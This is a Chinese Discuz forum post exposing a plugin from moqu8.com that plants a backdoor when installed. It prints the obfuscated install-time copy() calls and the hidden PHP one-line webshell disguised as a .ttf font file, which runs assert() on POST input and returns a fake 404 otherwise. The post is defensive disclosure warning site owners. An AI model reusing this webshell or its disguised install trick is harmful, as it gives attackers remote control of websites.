微信 手机版 Discuz!模板雇佣兵_忽悠兄 - Powered by Discuz! (本站已全新改版为 理想版V8 感谢大家支持。。。)
 找回密码
 立即注册

扫一扫,访问微社区

QQ登录

只需一步,快速开始

1101216848

10:30-23:00, 节假日不休息

揭秘魔趣吧moqu8.com传播木马过程以及证据,玩discuz的希望都看看 [复制链接]

微信扫一扫 分享朋友圈

MOQULAJI 发表于 2017-10-19 14:04:31 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
揭秘整个过程视频观看地址:
http://www.iqiyi.com/w_19rvbcv5vx.html
http://v.youku.com/v_show/id_XMzA5NDEyMDA2NA==.html
http://my.tv.sohu.com/us/326324566/93860557.shtml
请大家扩散出去,避免更多的无辜站长受害!

下面是录视频记录的内容

大家好,今天想下载一个资源,于是搜到了垃圾网站.魔趣吧
下载下来发现存在后门木马.严重威胁各位作网站的同行安全问题
今天我就来揭露该垃圾的嘴脸,希望不要有更多的站长被木马控制

http://www.moqu8.com/thread-7820-1-1.html

这是我们今天用来揭谜的帖子资源(其他的就不一一看了,因为我就是找这个资源找到这个垃圾网站的.差点被控制

我们先下载下来看看

MD5: 5165668B431963D971E14B19FB61959A
SHA1: 3BB656B048CD07A502D318EE58526E51D039A77B
CRC32: 4E12378A

附件信息
注意MD5 如果大家需要验证我说的是否真假验证MD5就可以防止我揭密后 被该垃圾站长修改了附件

木马的运行是一安装就注入了

require_once 'config/check.php';

copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/2.ttf',DISCUZ_ROOT.authcode('ca70pfWYubcn95qp9nCqz6i0TnMyEcZy3x1C85BwFgMtQ0Axj037kgspR6gporNzAtTMxC1q+1ovgZfdm3gr5negoq72+sdM/kmrFDy9','DECODE','addon'));
我们随便解密一段代码看看
copy(DISCUZ_ROOT.'source/plugin/wq_buluo/template/2.ttf',DISCUZ_ROOT.'./source/plugin/manyou/Service/Server/Sclouds.php');

翻译下得出

复制文件source/plugin/wq_buluo/template/2.ttf到/source/plugin/manyou/Service/Server/Sclouds.php

我们接下来看看2.ttf是个什么东西
<?php   
error_reporting(0);  
if($_POST['id']){  如果POST id不为空则运行下面的代码
$str='aert';
$e=trim($str,'ert').str_repeat('s',2).trim($str,'art').trim($str,'aet').trim($str,'aer');
assert($_POST['id']);//一句话木马
}else{否则返回404
header('HTTP/1.1 404 Not Found');

}
?>
由此可见该后门木马的运行程序是 安装插件时  复制 2.ttf到系统目录plugin/manyou  这个插件是系统自带的漫游插件 后台检测不到是否被修改 如果直接加在其他系统文件 后台的文件效应能够看到 够聪明的

综上可见该网站散播后门木马是不争的事实 希望各位discuz站长能够分享出去避免让更多的无辜站长受害

打着每个亲测 无后门的幌子欺骗善良的站长 此类行为该抵制

copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/index.htm',DISCUZ_ROOT.authcode('4de98tRmZEiyfCOIH31Y0XaMxQAndNsnuI8LV7g3lHkCxI0DEg1HDjhMfqoOKIMP5P46bbtF7Aiz2kyvI6bK5Gm/zKHVgQk','DECODE','addon'));}else{
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/index1.htm',DISCUZ_ROOT.authcode('4de98tRmZEiyfCOIH31Y0XaMxQAndNsnuI8LV7g3lHkCxI0DEg1HDjhMfqoOKIMP5P46bbtF7Aiz2kyvI6bK5Gm/zKHVgQk','DECODE','addon'));}
copy(DISCUZ_ROOT.'source/plugin/'.$pluginarray['plugin']['identifier'].'/template/1.ttf',DISCUZ_ROOT.authcode('ad35AdUSHEsWLkRwzMBl+UMWEcB4HJExecDO2x/97pJarU+VHRRZGDZnmUx2G3lmLEHH38YJNt1YZ+BRwv0sF3AU80jpA75YTBHAEesn4Q','DECODE','addon'));

这些代码解密出来意思也差不多 都市执行后门文件的注入

视频就到这里 谢谢大家观看

回复

使用道具 举报

精彩评论1

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

网站通告上一条 /1 下一条

微信赞助

支付宝赞助

现在马上加入忽悠兄基地,注册一个账号 本站账号登陆 QQ账号登陆 微信账号登陆
快速回复 返回顶部 返回列表